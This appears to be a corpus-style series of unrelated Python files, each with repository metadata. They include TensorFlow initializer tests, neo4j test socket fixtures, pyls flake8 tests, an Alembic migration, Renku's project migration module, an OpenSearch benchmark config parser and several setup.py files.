convolutional.conv1d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) input_with_circular_pad = circular_pad(inputs, shape[1], kernel_size[0]) outputs = convolution( input_with_circular_pad, padding="valid", filters=cout, kernel_size=kernel_size[0], use_bias=False, kernel_initializer=init_ops.convolutional_orthogonal_1d(gain=gain)) outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the orthogonal kernel. self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) class ConvolutionOrthogonal2dInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_2d(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_orthogonal_2d() self.assertFalse(duplicated_initializer(self, init, 1, (3, 3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_orthogonal_2d, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_orthogonal_2d() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 3, 6, 5]) def testGain(self): shape = (3, 3, 10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_2d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_2d(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testShapesValues(self): def circular_pad(input_, width, kernel_size): """Pad input_ for computing (circular) convolution. Args: input_: the input tensor width: the width of the tensor. kernel_size: the kernel size of the filter. Returns: a tensor whose width is (width + kernel_size - 1). """ beginning = kernel_size // 2 end = kernel_size - 1 - beginning tmp_up = array_ops.slice(input_, [0, width - beginning, 0, 0], [-1, beginning, width, -1]) tmp_down = array_ops.slice(input_, [0, 0, 0, 0], [-1, end, width, -1]) tmp = array_ops.concat([tmp_up, input_, tmp_down], 1) new_width = width + kernel_size - 1 tmp_left = array_ops.slice(tmp, [0, 0, width - beginning, 0], [-1, new_width, beginning, -1]) tmp_right = array_ops.slice(tmp, [0, 0, 0, 0], [-1, new_width, end, -1]) final = array_ops.concat([tmp_left, tmp, tmp_right], 2) return final cout = 45 shape = [64, 28, 28, 32] outputs_shape = shape[0:-1] + [cout] dtype = dtypes.float32 tol = 1e-3 gain = 3.14 # Check orthogonality/isometry by computing the ratio between # the 2-norms of the inputs and ouputs. for kernel_size in [[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]]: convolution = convolutional.conv2d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) input_with_circular_pad = circular_pad(inputs, shape[1], kernel_size[0]) outputs = convolution( input_with_circular_pad, padding="valid", filters=cout, kernel_size=kernel_size, use_bias=False, kernel_initializer=init_ops.convolutional_orthogonal_2d(gain=gain)) outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the orthogonal kernel. self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) class ConvolutionOrthogonal3dInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 3, 3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_3d(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 3, 3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_orthogonal_3d() self.assertFalse(duplicated_initializer(self, init, 1, (3, 3, 3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_orthogonal_3d, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_orthogonal_3d() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 3, 3, 6, 5]) def testGain(self): shape = (3, 3, 3, 10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_3d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_3d(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testNonuniformity(self): value = 0 abs_value = 0 shape = [3, 3, 3, 5, 5] count = 20 tol = 1e-5 with self.test_session(use_gpu=True): for i in range(count): x = variable_scope.get_variable("{}".format(i), shape=shape, initializer= init_ops.convolutional_orthogonal_3d) x.initializer.run() y = np.sum(x.eval(), axis=(0, 1, 2)) determinant = np.linalg.det(y) value += determinant abs_value += np.abs(determinant) # Check there is some variation in the signs of the determinants self.assertLess(value, count - tol) self.assertLess(-count + tol, value) # Check all determinants have absolute value 1 # Compute the sum of the absolute values of 'count' determinants self.assertAllClose(abs_value, count, rtol=tol, atol=tol) def testShapesValues(self): def circular_pad(input_, width, kernel_size): """Padding input_ for computing circular convolution. Args: input_: the input tensor width: the width of the tensor. kernel_size: the kernel size of the filter. Returns: a tensor whose width is (width + kernel_size - 1). """ beginning = kernel_size // 2 end = kernel_size - 1 - beginning tmp_up = array_ops.slice(input_, [0, width - beginning, 0, 0, 0], [-1, beginning, -1, -1, -1]) tmp_down = array_ops.slice(input_, [0, 0, 0, 0, 0], [-1, end, -1, -1, -1]) tmp = array_ops.concat([tmp_up, input_, tmp_down], 1) tmp_left = array_ops.slice(tmp, [0, 0, width - beginning, 0, 0], [-1, -1, beginning, -1, -1]) tmp_right = array_ops.slice(tmp, [0, 0, 0, 0, 0], [-1, -1, end, -1, -1]) tmp = array_ops.concat([tmp_left, tmp, tmp_right], 2) tmp_front = array_ops.slice(tmp, [0, 0, 0, width - beginning, 0], [-1, -1, -1, beginning, -1]) tmp_back = array_ops.slice(tmp, [0, 0, 0, 0, 0], [-1, -1, -1, end, -1]) return array_ops.concat([tmp_front, tmp, tmp_back], 3) cout = 32 shape = [1, 7, 7, 7, 16] outputs_shape = shape[0:-1] + [cout] dtype = dtypes.float32 tol = 1e-3 gain = 3.14 # Check orthogonality/isometry by computing the ratio between # the 2-norms of the inputs and ouputs. for kernel_size in [[1, 1, 1], [2, 2, 2], [3, 3, 3]]: convolution = convolutional.conv3d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) input_with_circular_pad = circular_pad(inputs, shape[1], kernel_size[0]) outputs = convolution( input_with_circular_pad, padding="valid", filters=cout, kernel_size=kernel_size[0], use_bias=False, kernel_initializer=init_ops.convolutional_orthogonal_3d(gain=gain)) outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the orthogonal kernel. self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) class IdentityInitializerTest(test.TestCase): def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.orthogonal_initializer, dtype=dtypes.string) def testInvalidShape(self): init = init_ops.identity_initializer() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init, shape=[5, 7, 7]) self.assertRaises(ValueError, init, shape=[5]) self.assertRaises(ValueError, init, shape=[]) def testNonSquare(self): init = init_ops.identity_initializer() shape = (10, 5) with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertAllClose(init(shape).eval(), np.eye(*shape)) def testGain(self): shape = (10, 10) for dtype in [dtypes.float32, dtypes.float64]: init_default = init_ops.identity_initializer(dtype=dtype) init_custom = init_ops.identity_initializer(gain=0.9, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertAllClose(init_default(shape).eval(), np.eye(*shape)) with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertAllClose(init_custom(shape).eval(), np.eye(*shape) * 0.9) def testPartitions(self): shape = (10, 10) init = init_ops.identity_initializer() partitioner = partitioned_variables.variable_axis_size_partitioner(1) with self.test_session(graph=ops.Graph(), use_gpu=True): with variable_scope.variable_scope( "foo", partitioner=partitioner, initializer=init): v = array_ops.identity(variable_scope.get_variable("bar", shape=shape)) variables.global_variables_initializer().run() self.assertAllClose(v.eval(), np.eye(*shape)) if __name__ == "__main__": test.main()
39.484259
80
0.658373
795aa716de8a59aaf48ad8674900ae0e3b5bd283
133
py
Python
sheet/urls.py
metadeng/LVTUBEN_CD_TOOLKIL
217e78974b171276d69fcc8f75719be44c218c9d
[ "MIT" ]
null
null
null
sheet/urls.py
metadeng/LVTUBEN_CD_TOOLKIL
217e78974b171276d69fcc8f75719be44c218c9d
[ "MIT" ]
11
2020-02-12T00:14:11.000Z
2022-03-11T23:46:37.000Z
sheet/urls.py
metadeng/LVTUBEN_CD_TOOLKIL
217e78974b171276d69fcc8f75719be44c218c9d
[ "MIT" ]
null
null
null
from django.urls import path from sheet import views app_name = 'sheet' urlpatterns = [ path('', views.index, name='index'), ]
14.777778
40
0.684211
795aa7ae04ef88c6b8c48e573fe43dc6312f65a9
3,991
py
Python
tests/unit/sync/io/conftest.py
polyrize/neo4j-python-driver
1ed96f94a7a59f49c473dadbb81715dc9651db98
[ "Apache-2.0" ]
null
null
null
tests/unit/sync/io/conftest.py
polyrize/neo4j-python-driver
1ed96f94a7a59f49c473dadbb81715dc9651db98
[ "Apache-2.0" ]
null
null
null
tests/unit/sync/io/conftest.py
polyrize/neo4j-python-driver
1ed96f94a7a59f49c473dadbb81715dc9651db98
[ "Apache-2.0" ]
null
null
null
# Copyright (c) "Neo4j" # Neo4j Sweden AB [https://neo4j.com] # # This file is part of Neo4j. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from io import BytesIO from struct import ( pack as struct_pack, unpack as struct_unpack, ) import pytest from neo4j._sync.io._common import MessageInbox from neo4j.packstream import ( Packer, UnpackableBuffer, Unpacker, ) class FakeSocket: def __init__(self, address): self.address = address self.captured = b"" self.messages = MessageInbox(self, on_error=print) def getsockname(self): return "127.0.0.1", 0xFFFF def getpeername(self): return self.address def recv_into(self, buffer, nbytes): data = self.captured[:nbytes] actual = len(data) buffer[:actual] = data self.captured = self.captured[actual:] return actual def sendall(self, data): self.captured += data def close(self): return def pop_message(self): return self.messages.pop() class FakeSocket2: def __init__(self, address=None, on_send=None): self.address = address self.recv_buffer = bytearray() self._messages = MessageInbox(self, on_error=print) self.on_send = on_send def getsockname(self): return "127.0.0.1", 0xFFFF def getpeername(self): return self.address def recv_into(self, buffer, nbytes): data = self.recv_buffer[:nbytes] actual = len(data) buffer[:actual] = data self.recv_buffer = self.recv_buffer[actual:] return actual def sendall(self, data): if callable(self.on_send): self.on_send(data) def close(self): return def inject(self, data): self.recv_buffer += data def _pop_chunk(self): chunk_size, = struct_unpack(">H", self.recv_buffer[:2]) print("CHUNK SIZE %r" % chunk_size) end = 2 + chunk_size chunk_data, self.recv_buffer = self.recv_buffer[2:end], self.recv_buffer[end:] return chunk_data def pop_message(self): data = bytearray() while True: chunk = self._pop_chunk() print("CHUNK %r" % chunk) if chunk: data.extend(chunk) elif data: break # end of message else: continue # NOOP header = data[0] n_fields = header % 0x10 tag = data[1] buffer = UnpackableBuffer(data[2:]) unpacker = Unpacker(buffer) fields = [unpacker.unpack() for _ in range(n_fields)] return tag, fields def send_message(self, tag, *fields): data = self.encode_message(tag, *fields) self.sendall(struct_pack(">H", len(data)) + data + b"\x00\x00") @classmethod def encode_message(cls, tag, *fields): b = BytesIO() packer = Packer(b) for field in fields: packer.pack(field) return bytearray([0xB0 + len(fields), tag]) + b.getvalue() class FakeSocketPair: def __init__(self, address): self.client = FakeSocket2(address) self.server = FakeSocket2() self.client.on_send = self.server.inject self.server.on_send = self.client.inject @pytest.fixture def fake_socket(): return FakeSocket @pytest.fixture def fake_socket_2(): return FakeSocket2 @pytest.fixture def fake_socket_pair(): return FakeSocketPair
25.420382
86
0.625658
795aa7cd6edd0197fe46cf8128288d33dff0951d
1,428
py
Python
setup.py
nodemash/safetyfirst
dab50ae7084e838d42a2617d94b83da958dcb615
[ "MIT" ]
null
null
null
setup.py
nodemash/safetyfirst
dab50ae7084e838d42a2617d94b83da958dcb615
[ "MIT" ]
null
null
null
setup.py
nodemash/safetyfirst
dab50ae7084e838d42a2617d94b83da958dcb615
[ "MIT" ]
null
null
null
import setuptools from safetyfirst.version import Version install_requires = [ 'pytest', 'pytest-cov', 'ndg-httpsclient', 'pyopenssl', 'pyasn1' ] setuptools.setup( name='safetyfirst', version=Version('1.0.0').number, description='Python SSL Checker', long_description=open('README.md').read().strip(), author='Robert Hoppe', author_email='robert.hoppe@nodemash.com', url='http://nodemash.com', py_modules=['safetyfirst'], install_requires=install_requires, license='MIT', zip_safe=False, keywords='ssl certificate validation', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities' ], entry_points={ 'console_scripts': [ 'safety_ssl_check = safetyfirst.utilities.ssl_check:launch_new_instance' ] } )
30.382979
84
0.618347
795aa80d1fa73162de1cb85592f768632e048870
945
py
Python
setup.py
copyit/AnyAPI
528109878a16a29c4cf7ff20b2dfaee8d2234a13
[ "MIT" ]
null
null
null
setup.py
copyit/AnyAPI
528109878a16a29c4cf7ff20b2dfaee8d2234a13
[ "MIT" ]
null
null
null
setup.py
copyit/AnyAPI
528109878a16a29c4cf7ff20b2dfaee8d2234a13
[ "MIT" ]
null
null
null
import pathlib from setuptools import setup # The directory containing this file HERE = pathlib.Path(__file__).parent # The text of the README file README = (HERE / "README.md").read_text() # This call to setup() does all the work setup( name="anyapi", version="1.1.701", description="An API Wrapper For Every API", long_description=README, long_description_content_type="text/markdown", url="https://github.com/FKLC/AnyAPI", author="Fatih Kılıç", author_email="m.fatihklc0@gmail.com", license="MIT", classifiers=[ "Programming Language :: Python :: 3.5", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], packages=["anyapi"], install_requires=["requests", "AttributeRouter==1.0.0"], )
29.53125
60
0.648677
795aa93e431a800f272e05a0f648f4fb868aae61
2,100
py
Python
test/plugins/test_flake8_lint.py
borisbarath/python-language-server
b03f2d791e0ed66d5f1cc544869c0383cfdc3d9d
[ "MIT" ]
null
null
null
test/plugins/test_flake8_lint.py
borisbarath/python-language-server
b03f2d791e0ed66d5f1cc544869c0383cfdc3d9d
[ "MIT" ]
null
null
null
test/plugins/test_flake8_lint.py
borisbarath/python-language-server
b03f2d791e0ed66d5f1cc544869c0383cfdc3d9d
[ "MIT" ]
null
null
null
# Copyright 2019 Palantir Technologies, Inc. import tempfile import os from test.test_utils import MockWorkspace from mock import patch from pyls import lsp, uris from pyls.plugins import flake8_lint from pyls.workspace import Document DOC_URI = uris.from_fs_path(__file__) DOC = """import pyls t = "TEST" def using_const(): \ta = 8 + 9 \treturn t """ def temp_document(doc_text): temp_file = tempfile.NamedTemporaryFile(mode='w', delete=False) name = temp_file.name temp_file.write(doc_text) temp_file.close() doc = Document(uris.from_fs_path(name), MockWorkspace()) return name, doc def test_flake8_no_checked_file(config, workspace): # A bad uri or a non-saved file may cause the flake8 linter to do nothing. # In this situtation, the linter will return an empty list. doc = Document('', workspace, DOC) diags = flake8_lint.pyls_lint(config, doc) assert diags == [] def test_flake8_lint(config): try: name, doc = temp_document(DOC) diags = flake8_lint.pyls_lint(config, doc) msg = 'local variable \'a\' is assigned to but never used' unused_var = [d for d in diags if d['message'] == msg][0] assert unused_var['source'] == 'flake8' assert unused_var['code'] == 'F841' assert unused_var['range']['start'] == {'line': 5, 'character': 1} assert unused_var['range']['end'] == {'line': 5, 'character': 11} assert unused_var['severity'] == lsp.DiagnosticSeverity.Warning finally: os.remove(name) def test_flake8_config_param(config): with patch('pyls.plugins.flake8_lint.Popen') as popen_mock: mock_instance = popen_mock.return_value mock_instance.communicate.return_value = [bytes(), bytes()] flake8_conf = '/tmp/some.cfg' config.update({'plugins': {'flake8': {'config': flake8_conf}}}) _name, doc = temp_document(DOC) flake8_lint.pyls_lint(config, doc) call_args = popen_mock.call_args.args[0] assert 'flake8' in call_args assert '--config={}'.format(flake8_conf) in call_args
30.434783
78
0.672857
795aa94402e3cf6ef1b52a545714917549c9886a
1,394
py
Python
web_console_v2/api/migrations/versions/1c9f8c908061_initial_migration.py
zhenv5/fedlearner
a8ff0eaef48e174d432a40d23d12c1f57e842ebd
[ "Apache-2.0" ]
null
null
null
web_console_v2/api/migrations/versions/1c9f8c908061_initial_migration.py
zhenv5/fedlearner
a8ff0eaef48e174d432a40d23d12c1f57e842ebd
[ "Apache-2.0" ]
null
null
null
web_console_v2/api/migrations/versions/1c9f8c908061_initial_migration.py
zhenv5/fedlearner
a8ff0eaef48e174d432a40d23d12c1f57e842ebd
[ "Apache-2.0" ]
null
null
null
"""Initial migration. Revision ID: 1c9f8c908061 Revises: Create Date: 2020-11-25 16:57:46.699205 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '1c9f8c908061' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('projects_v2', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=255), nullable=True), sa.Column('config', sa.Text(), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_projects_v2_name'), 'projects_v2', ['name'], unique=False) op.create_table('users_v2', sa.Column('id', sa.Integer(), nullable=False), sa.Column('username', sa.String(length=255), nullable=True), sa.Column('password', sa.String(length=255), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_users_v2_username'), 'users_v2', ['username'], unique=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_users_v2_username'), table_name='users_v2') op.drop_table('users_v2') op.drop_index(op.f('ix_projects_v2_name'), table_name='projects_v2') op.drop_table('projects_v2') # ### end Alembic commands ###
30.977778
89
0.685079
795aa95db417c81433e90c183d0f6c2be14c92cc
12,143
py
Python
renku/core/management/migrate.py
TaoSunVoyage/renku-python
858fe84ce2925a49d9b62638dc601f581e24353e
[ "Apache-2.0" ]
null
null
null
renku/core/management/migrate.py
TaoSunVoyage/renku-python
858fe84ce2925a49d9b62638dc601f581e24353e
[ "Apache-2.0" ]
null
null
null
renku/core/management/migrate.py
TaoSunVoyage/renku-python
858fe84ce2925a49d9b62638dc601f581e24353e
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright 2017-2021 - Swiss Data Science Center (SDSC) # A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and # Eidgenössische Technische Hochschule Zürich (ETHZ). # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Renku migrations management. Migrations files are put in renku/core/management/migrations directory. Name of these files has m_1234__name.py format where 1234 is the migration version and name can be any alphanumeric and underscore combination. Migration files are sorted based on their lowercase name. Each migration file must define a public "migrate" function that accepts a client as its argument. When executing a migration, the migration file is imported as a module and the "migrate" function is executed. Migration version is checked against the Renku project version (in .renku/metadata.yml) and any migration which has a higher version is applied to the project. """ import hashlib import importlib import json import os import re import shutil from pathlib import Path import pkg_resources from jinja2 import Template from renku.core.errors import ( DockerfileUpdateError, MigrationError, MigrationRequired, ProjectNotSupported, TemplateUpdateError, ) from renku.core.management.command_builder.command import inject from renku.core.utils import communication from renku.core.utils.migrate import read_project_version SUPPORTED_PROJECT_VERSION = 9 def check_for_migration(): """Checks if migration is required.""" if is_migration_required(): raise MigrationRequired elif is_project_unsupported(): raise ProjectNotSupported def is_migration_required(): """Check if project requires migration.""" return is_renku_project() and _get_project_version() < SUPPORTED_PROJECT_VERSION def is_project_unsupported(): """Check if this version of Renku cannot work with the project.""" return is_renku_project() and _get_project_version() > SUPPORTED_PROJECT_VERSION def is_template_update_possible(): """Check if the project can be updated to a newer version of the project template.""" return _update_template(check_only=True) def is_docker_update_possible(): """Check if the Dockerfile can be updated to a new version of renku-python.""" return _update_dockerfile(check_only=True) @inject.params(client="LocalClient") def migrate( client, force_template_update=False, skip_template_update=False, skip_docker_update=False, skip_migrations=False, project_version=None, max_version=None, ): """Apply all migration files to the project.""" template_updated = docker_updated = False if not is_renku_project(): return False, template_updated, docker_updated if ( not skip_template_update and client.project.template_source and (force_template_update or client.project.automated_update) ): try: template_updated, _, _ = _update_template() except TemplateUpdateError: raise except (Exception, BaseException) as e: raise TemplateUpdateError("Couldn't update from template.") from e if not skip_docker_update: try: docker_updated = _update_dockerfile() except DockerfileUpdateError: raise except (Exception, BaseException) as e: raise DockerfileUpdateError("Couldn't update renku version in Dockerfile.") from e if skip_migrations: return False, template_updated, docker_updated project_version = project_version or _get_project_version() n_migrations_executed = 0 version = 1 for version, path in get_migrations(): if max_version and version > max_version: break if version > project_version: module = importlib.import_module(path) module_name = module.__name__.split(".")[-1] communication.echo(f"Applying migration {module_name}...") try: module.migrate(client) except (Exception, BaseException) as e: raise MigrationError("Couldn't execute migration") from e n_migrations_executed += 1 if n_migrations_executed > 0 and not client.is_using_temporary_datasets_path(): client._project = None # NOTE: force reloading of project metadata client.project.version = str(version) client.project.to_yaml() communication.echo(f"Successfully applied {n_migrations_executed} migrations.") return n_migrations_executed != 0, template_updated, docker_updated @inject.params(client="LocalClient") def _update_template(client, check_only=False): """Update local files from the remote template.""" from renku.core.commands.init import fetch_template project = client.project if not project.template_version: return False, None, None template_manifest, template_folder, template_source, template_version = fetch_template( project.template_source, project.template_ref ) if template_source == "renku": template_version = pkg_resources.parse_version(template_version) current_version = pkg_resources.parse_version(project.template_version) if template_version <= current_version: return False, project.template_version, current_version else: if template_version == project.template_version: return False, project.template_version, template_version if check_only: return True, project.template_version, template_version communication.echo("Updating project from template...") template_filtered = [ template_elem for template_elem in template_manifest if template_elem["folder"] == project.template_id ] if len(template_filtered) == 1: template_data = template_filtered[0] else: raise TemplateUpdateError(f'The template with id "{project.template_id}" is not available.') template_path = template_folder / template_data["folder"] metadata = json.loads(project.template_metadata) template_variables = set(template_data.get("variables", {}).keys()) metadata_keys = set(metadata.keys()) missing_keys = ", ".join(template_variables - metadata_keys) if missing_keys: raise TemplateUpdateError( f"Can't update template, it now requires variable(s) {missing_keys} which were not present on project " "creation." ) if not os.path.exists(client.template_checksums): raise TemplateUpdateError("Can't update template as there are no template checksums set on the project.") with open(client.template_checksums, "r") as checksum_file: checksums = json.load(checksum_file) updated_files = [] for file in template_path.glob("**/*"): rel_path = file.relative_to(template_path) destination = client.path / rel_path # NOTE: the path could contain template variables, we need to template it destination = Path(Template(str(destination)).render(metadata)) try: # parse file and process it template = Template(file.read_text()) rendered_content = template.render(metadata) sha256_hash = hashlib.sha256() content_bytes = rendered_content.encode("utf-8") blocksize = 4096 blocks = (len(content_bytes) - 1) // blocksize + 1 for i in range(blocks): byte_block = content_bytes[i * blocksize : (i + 1) * blocksize] sha256_hash.update(byte_block) new_template_hash = sha256_hash.hexdigest() if not destination.exists() and str(rel_path) not in checksums: # NOTE: new file in template local_changes = False remote_changes = True else: current_hash = None # NOTE: None if user deleted file locally if destination.exists(): current_hash = client._content_hash(destination) local_changes = str(rel_path) not in checksums or current_hash != checksums[str(rel_path)] remote_changes = str(rel_path) not in checksums or new_template_hash != checksums[str(rel_path)] if local_changes: if remote_changes and str(rel_path) in project.immutable_template_files: # NOTE: There are local changes in a file that should not be changed by users, # and the file was updated in the template as well. So the template can't be updated. raise TemplateUpdateError( f"Can't update template as immutable template file {rel_path} has local changes." ) continue elif not remote_changes: continue destination.write_text(rendered_content) except IsADirectoryError: destination.mkdir(parents=True, exist_ok=True) except TypeError: shutil.copy(file, destination) updated = "\n".join(updated_files) communication.echo(f"Updated project from template, updated files:\n{updated}") project.template_version = template_version project.to_yaml() return True, project.template_version, template_version @inject.params(client="LocalClient") def _update_dockerfile(client, check_only=False): """Update the dockerfile to the newest version of renku.""" from renku import __version__ if not client.docker_path.exists(): return False communication.echo("Updating dockerfile...") with open(client.docker_path, "r") as f: dockercontent = f.read() current_version = pkg_resources.parse_version(__version__) m = re.search(r"^ARG RENKU_VERSION=(\d+\.\d+\.\d+)$", dockercontent, flags=re.MULTILINE) if not m: if check_only: return False raise DockerfileUpdateError( "Couldn't update renku-python version in Dockerfile, as it doesn't contain an 'ARG RENKU_VERSION=...' line." ) docker_version = pkg_resources.parse_version(m.group(1)) if docker_version >= current_version: return False if check_only: return True dockercontent = re.sub( r"^ARG RENKU_VERSION=\d+\.\d+\.\d+$", f"ARG RENKU_VERSION={__version__}", dockercontent, flags=re.MULTILINE ) with open(client.docker_path, "w") as f: f.write(dockercontent) communication.echo("Updated dockerfile.") return True @inject.params(client="LocalClient") def _get_project_version(client): try: return int(read_project_version(client)) except ValueError: return 1 @inject.params(client="LocalClient") def is_renku_project(client): """Check if repository is a renku project.""" try: return client.project is not None except ValueError: # Error in loading due to an older schema return client.renku_metadata_path.exists() def get_migrations(): """Return a sorted list of versions and migration modules.""" migrations = [] for file_ in pkg_resources.resource_listdir("renku.core.management", "migrations"): match = re.search(r"m_([0-9]{4})__[a-zA-Z0-9_-]*.py", file_) if match is None: # migration files match m_0000__[name].py format continue version = int(match.groups()[0]) path = "renku.core.management.migrations.{}".format(Path(file_).stem) migrations.append((version, path)) migrations = sorted(migrations, key=lambda v: v[1].lower()) return migrations
35.926036
120
0.688627
795aab1b23393cb1ec478a592131034f8ce34e08
1,946
py
Python
benchmarks/perf-tool/okpt/io/config/parsers/base.py
martin-gaievski/k-NN
77353512c1f15e0dc996428a982941a7ee3036fb
[ "Apache-2.0" ]
44
2021-04-20T18:06:56.000Z
2022-03-31T00:59:07.000Z
benchmarks/perf-tool/okpt/io/config/parsers/base.py
martin-gaievski/k-NN
77353512c1f15e0dc996428a982941a7ee3036fb
[ "Apache-2.0" ]
227
2021-04-21T12:21:46.000Z
2022-03-31T22:43:04.000Z
benchmarks/perf-tool/okpt/io/config/parsers/base.py
martin-gaievski/k-NN
77353512c1f15e0dc996428a982941a7ee3036fb
[ "Apache-2.0" ]
31
2021-04-21T02:18:09.000Z
2022-03-25T23:47:17.000Z
# SPDX-License-Identifier: Apache-2.0 # # The OpenSearch Contributors require contributions made to # this file be licensed under the Apache-2.0 license or a # compatible open source license. """Base Parser class. Classes: BaseParser: Base class for config parsers. Exceptions: ConfigurationError: An error in the configuration syntax. """ import os from io import TextIOWrapper import cerberus from okpt.io.utils import reader class ConfigurationError(Exception): """Exception raised for errors in the tool configuration. Attributes: message -- explanation of the error """ def __init__(self, message: str): self.message = f'{message}' super().__init__(self.message) def _get_validator_from_schema_name(schema_name: str): """Get the corresponding Cerberus validator from a schema name.""" curr_file_dir = os.path.dirname(os.path.abspath(__file__)) schemas_dir = os.path.join(os.path.dirname(curr_file_dir), 'schemas') schema_file_path = os.path.join(schemas_dir, f'{schema_name}.yml') schema_obj = reader.parse_yaml_from_path(schema_file_path) return cerberus.Validator(schema_obj) class BaseParser: """Base class for config parsers. Attributes: validator: Cerberus validator for a particular schema errors: Cerberus validation errors (if any are found during validation) Methods: parse: Parse config. """ def __init__(self, schema_name: str): self.validator = _get_validator_from_schema_name(schema_name) self.errors = '' def parse(self, file_obj: TextIOWrapper): """Convert file object to dict, while validating against config schema.""" config_obj = reader.parse_yaml(file_obj) is_config_valid = self.validator.validate(config_obj) if not is_config_valid: raise ConfigurationError(self.validator.errors) return self.validator.document
28.617647
82
0.715827
795aab52a3db8a7f3584a0057803cac3eb701128
7,417
py
